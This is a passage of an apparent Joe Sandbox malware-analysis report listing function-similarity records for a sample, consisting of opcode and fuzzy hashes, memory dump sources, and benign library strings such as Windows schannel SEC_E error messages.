                    • Opcode ID: bea25d0c387407e89af487cf51dd4070dac09ee8df95682c15afe5d7cc2464b0
                    • Instruction ID: 04bcfa0949c6fa95fa06a91cc76c0c0a0510ec9c3740775eadef08585bb0c61a
                    • Opcode Fuzzy Hash: bea25d0c387407e89af487cf51dd4070dac09ee8df95682c15afe5d7cc2464b0
                    • Instruction Fuzzy Hash: 65019222B0864286F711BF91A4401FAE391EF847A4FC80136EA1E427C5DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_CERT_UNKNOWN
                    • API String ID: 1452528299-169894802
                    • Opcode ID: 5fc6a23aecc3f71f451275b01cec7b1dc1d9d2629abf6af712ce95fe702ab1a0
                    • Instruction ID: c86e2d0d776f3e36ad73dda9e70f79aa5f2de6225ed706a9c2601db8e2c15eeb
                    • Opcode Fuzzy Hash: 5fc6a23aecc3f71f451275b01cec7b1dc1d9d2629abf6af712ce95fe702ab1a0
                    • Instruction Fuzzy Hash: DB019222B0864286F711BF91A4401FAE291EF847A4FC80136DA1E467C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_CERT_EXPIRED
                    • API String ID: 1452528299-3192465694
                    • Opcode ID: 2ce6dc1366a28d8a0c545d03e831b4990b72eb4646446e073adc300a0cc3962d
                    • Instruction ID: 9980d482ee3eda7fdfb3248e706045394209b3092f6db6c22f36d2a6827752e4
                    • Opcode Fuzzy Hash: 2ce6dc1366a28d8a0c545d03e831b4990b72eb4646446e073adc300a0cc3962d
                    • Instruction Fuzzy Hash: 98019222B0864286F711BF91A4401FAE291EF847A4FC80136EA1E427D1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_PACK
                    • API String ID: 1452528299-1144097955
                    • Opcode ID: 7ecb94198fa92746fdb32a5ff9d868647b4336e66989237da6fa02f9a96f4bf0
                    • Instruction ID: 63c00ce89605eb7a55521f54332cbdb2ead642be1828e21261c1a9a397db4019
                    • Opcode Fuzzy Hash: 7ecb94198fa92746fdb32a5ff9d868647b4336e66989237da6fa02f9a96f4bf0
                    • Instruction Fuzzy Hash: EC019222B0864286F711BF91E4401FAE291EF847A4FC80136DA1E427C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_INSTALL
                    • API String ID: 1452528299-3689135316
                    • Opcode ID: 9daf5c159f35477d2cfe39f76e5e7c2033782e7558094459004d51f560fd1d6c
                    • Instruction ID: 0f7a9de6c8afa0a46aa10639ba339b6374d2946461d5521855d3d2e10b10e14a
                    • Opcode Fuzzy Hash: 9daf5c159f35477d2cfe39f76e5e7c2033782e7558094459004d51f560fd1d6c
                    • Instruction Fuzzy Hash: 02019222B0864286F711BF91A0401FAE291EF847A4FC80136EA1E427D1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_REQUIRED
                    • API String ID: 1452528299-3988574617
                    • Opcode ID: 2d156049574ab5650331bff3d0b0abbf862625c5e78bb5a2c5e7f96011c5247f
                    • Instruction ID: 4a0f396c073bb5617dd841b17e5c52edb976d3595de114bfb3ec43c74a6f707f
                    • Opcode Fuzzy Hash: 2d156049574ab5650331bff3d0b0abbf862625c5e78bb5a2c5e7f96011c5247f
                    • Instruction Fuzzy Hash: 58019222B0864286F711BF91A4401FAE291EF847A4FC80136DA2E427C5DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_POLICY
                    • API String ID: 1452528299-829877842
                    • Opcode ID: 81e1de54d1116b02e66ce1c65efcf73dc226e2910f5ff0574cfe61c8a9d2bf15
                    • Instruction ID: fcfe88cbaf4d8d2be9b6190f1030afb5a569c26df83692d8cbc006bc07b6fb83
                    • Opcode Fuzzy Hash: 81e1de54d1116b02e66ce1c65efcf73dc226e2910f5ff0574cfe61c8a9d2bf15
                    • Instruction Fuzzy Hash: 2F019222B0864286F711BF91A4401FAE291FF847A4FC80136EA1E427C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_DECRYPT_FAILURE
                    • API String ID: 1452528299-1043736155
                    • Opcode ID: 9a62bc3d6a2c19295cc0a3be99a7a29b01af618fb579ffec2b1fb00194208109
                    • Instruction ID: fc29df9880e878ff04633957ad5f89e4eb22ebf9cb6883635dcb6930aed10bdb
                    • Opcode Fuzzy Hash: 9a62bc3d6a2c19295cc0a3be99a7a29b01af618fb579ffec2b1fb00194208109
                    • Instruction Fuzzy Hash: 7C019222B0864286F711BF91A4401FAE291EF847A4FC80136DA1E427C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_CRYPTO_SYSTEM_INVALID
                    • API String ID: 1452528299-3331766186
                    • Opcode ID: 3715786bb4aac3babbd226584138160f4850d073428448af691232985c4c6c76
                    • Instruction ID: cbf2e68bbd4bb4d8f17364293ffe23d072e4e957283d26732422cd326617f32e
                    • Opcode Fuzzy Hash: 3715786bb4aac3babbd226584138160f4850d073428448af691232985c4c6c76
                    • Instruction Fuzzy Hash: 1D019222B0864286F711BF91A4401FAE291EF847A4FC80136DA1E427C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_CROSSREALM_DELEGATION_FAILURE
                    • API String ID: 1452528299-3852342135
                    • Opcode ID: adeba84714067579b486a80663df9f4757600ad79abecc6a7c53b5d2d7b3fb97
                    • Instruction ID: 5229131193da1aad889ad2201350a7f7c7edb9fe56a90496001976c5584a5868
                    • Opcode Fuzzy Hash: adeba84714067579b486a80663df9f4757600ad79abecc6a7c53b5d2d7b3fb97
                    • Instruction Fuzzy Hash: 3A018022B0864286F711BF91A4401FAE291AF847A4FC80136EA1E426C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_INCOMPLETE_CREDENTIALS
                    • API String ID: 1452528299-1320471878
                    • Opcode ID: 98eb5c07ee6d923311b581e697e50350d1e267376b22d1eaef65fc943e2e01a7
                    • Instruction ID: 53ee42037be3dda5f93809af59e3934ea6d34800ed1f2a5c50e25eb2bc8fda32
                    • Opcode Fuzzy Hash: 98eb5c07ee6d923311b581e697e50350d1e267376b22d1eaef65fc943e2e01a7
                    • Instruction Fuzzy Hash: 36019222B0864286F711BF91A4401FAE391EF847A4FC80136EA5E427D5DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_ENCRYPT_FAILURE
                    • API String ID: 1452528299-3371550302
                    • Opcode ID: 681d8786de94ca0bf05ec348a8407953c362b8b248bda307549e02da190198e6
                    • Instruction ID: 0dc0c1de3370c04a22e4e3e73ac4a6f12993a4dac5f3817d348d0fb658f292ec
                    • Opcode Fuzzy Hash: 681d8786de94ca0bf05ec348a8407953c362b8b248bda307549e02da190198e6
                    • Instruction Fuzzy Hash: C9019222B0864286F711BF91A0401FAE291EF847A4FC80136DA5E467C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_DOWNGRADE_DETECTED
                    • API String ID: 1452528299-1814928707
                    • Opcode ID: d28a49420191b8733ad25d842b31019e11652f5cbe7bb077410a18514324a075
                    • Instruction ID: 073feb782998f846426743776346c0079401172b080ceee49c783dd1b848fbc4
                    • Opcode Fuzzy Hash: d28a49420191b8733ad25d842b31019e11652f5cbe7bb077410a18514324a075
                    • Instruction Fuzzy Hash: 4A019222B0864286F711BF91A0401FAE291EF847A4FC80136DA5E427C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_BUFFER_TOO_SMALL
                    • API String ID: 1452528299-3213503683
                    • Opcode ID: 52c302cbd59e8379f98d3a1802b7cc2a73fc9db103624da0e740cd3d605cfd90
                    • Instruction ID: 1ffc1050a49701566fb8a96aa641a282e12b04b0f3e11f4a0e45897bcadae8e5
                    • Opcode Fuzzy Hash: 52c302cbd59e8379f98d3a1802b7cc2a73fc9db103624da0e740cd3d605cfd90
                    • Instruction Fuzzy Hash: 1C019222B0864286F715BF91A0401FAE291EF847A4FC80136DA5E427C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_BAD_PKGID
                    • API String ID: 1452528299-428854770
                    • Opcode ID: b9c5434bdcfc51da69b0d64449c845420c1526d4885dbfea43497ebcfda996a2
                    • Instruction ID: 2e221c53dde6e9f483ad1427d7318b5db7b3f79e2e27001c0ce31e222a21ce9f
                    • Opcode Fuzzy Hash: b9c5434bdcfc51da69b0d64449c845420c1526d4885dbfea43497ebcfda996a2
                    • Instruction Fuzzy Hash: 92019222B0864286F711BF91A0401FAE291EF847A4FC8013ADA5E427C1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_BAD_BINDINGS
                    • API String ID: 1452528299-4193802906
                    • Opcode ID: f56b8771fc51f5f3279d0fe50af72ee861edcf998c4d63b746adcc0f9d3e3b09
                    • Instruction ID: 0eacde21626b5bbf4ab7479cb434b7f3751730f137792dcac4114db719aee028
                    • Opcode Fuzzy Hash: f56b8771fc51f5f3279d0fe50af72ee861edcf998c4d63b746adcc0f9d3e3b09
                    • Instruction Fuzzy Hash: 64019222B0864286F711BF91A0401FAE291EF847A4FC80136EA1E427C1DFBCE581CBB0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                    • String ID:
                    • API String ID: 2933794660-0
                    • Opcode ID: e3efa84a33425bf3599075b9e91b157449be3bddb301149fd16c82d366f109b1
                    • Instruction ID: 4794a646e90e7901ff4094b4a626ad7f183658a91d81be20afe10ec363f46394
                    • Opcode Fuzzy Hash: e3efa84a33425bf3599075b9e91b157449be3bddb301149fd16c82d366f109b1
                    • Instruction Fuzzy Hash: 66113322B14F058AEB00DF60E8552B873B4FB19758F841D35EE6D86794DF78E1588390
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_ALGORITHM_MISMATCH
                    • API String ID: 1452528299-3091687665
                    • Opcode ID: 71e1427b8772e10c730b27d4480ede672be9ca382ff8b5f88153a1fd3c35ae70
                    • Instruction ID: 6a5d37d99b7d42f9c4eec5db80c5554ca0008faedb3dadf1067717362cfe1776
                    • Opcode Fuzzy Hash: 71e1427b8772e10c730b27d4480ede672be9ca382ff8b5f88153a1fd3c35ae70
                    • Instruction Fuzzy Hash: 8F019222B1864286F711BF51E0401FAE251EF84794FC80136DA1E427C1DFBCE081CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: 0
                    • API String ID: 3668304517-4108050209
                    • Opcode ID: 6262ba0a505497cbf118712e0f1702e3b4993a8ac86477dae53376ad7317d42f
                    • Instruction ID: 25fdb2a24521c3efc464d385489351edc17dceb0fd3239088557f582aedeed4d
                    • Opcode Fuzzy Hash: 6262ba0a505497cbf118712e0f1702e3b4993a8ac86477dae53376ad7317d42f
                    • Instruction Fuzzy Hash: 70B1A363F08B8585EB10DFB9D1402ECA3B1EB58B98F804225DE6D67B89DF78D545C350
                    APIs
                      • Part of subcall function 00007FF7F13222B0: GetOEMCP.KERNEL32(00000000,00000647,00007FF7F132292A,00007FF7F131388E), ref: 00007FF7F13222DA
                    • IsValidCodePage.KERNEL32(00000000,00000647,00007FF7F132292A,00007FF7F131388E), ref: 00007FF7F13229C1
                    • GetCPInfo.KERNEL32 ref: 00007FF7F1322A05
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CodeInfoPageValid
                    • String ID: COMSPEC
                    • API String ID: 546120528-1631433037
                    • Opcode ID: 716c4281b20af5855eed3fcffdd6e4990f84bd3080259622a2ccce696bb3e0e8
                    • Instruction ID: 5ce8991dea33032d63b1997eafbd7a3ed7d2c26114f81644a879020b4125fe26
                    • Opcode Fuzzy Hash: 716c4281b20af5855eed3fcffdd6e4990f84bd3080259622a2ccce696bb3e0e8
                    • Instruction Fuzzy Hash: 23819F62A086C287F775BF259850179FAA1EF44740F99407EC6AE07AD1DFBCE541C3A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                    • API String ID: 0-3891197721
                    • Opcode ID: 8833624f6f39a0f5345e63ed889a8bfc00f102e4eb991627d69e7167e146596f
                    • Instruction ID: 03b8fcc6fcc5d7f679b75cfa0408eda079986a7ea87722f3ad3143d8a96e0bcd
                    • Opcode Fuzzy Hash: 8833624f6f39a0f5345e63ed889a8bfc00f102e4eb991627d69e7167e146596f
                    • Instruction Fuzzy Hash: 0D71A032B047418AF710EBAAD8446AD73A5AB48BB8F814235DF3D977D4DFB8A415C390
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: __except_validate_context_record
                    • String ID: csm$csm
                    • API String ID: 1467352782-3733052814
                    • Opcode ID: d27c20c6db0fcab9b5cee18de44c2c6736b35de5fcdb5a059b8b6961fdeac583
                    • Instruction ID: 23b6d0a9c79813a818d851e8472575633543c672a6cf07fb8ccb4a7491eca2e5
                    • Opcode Fuzzy Hash: d27c20c6db0fcab9b5cee18de44c2c6736b35de5fcdb5a059b8b6961fdeac583
                    • Instruction Fuzzy Hash: 5E719F72A0868187DB61AF25904077DFBE0FF01B88F98813ADEAD57AC5CB6CD451C790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
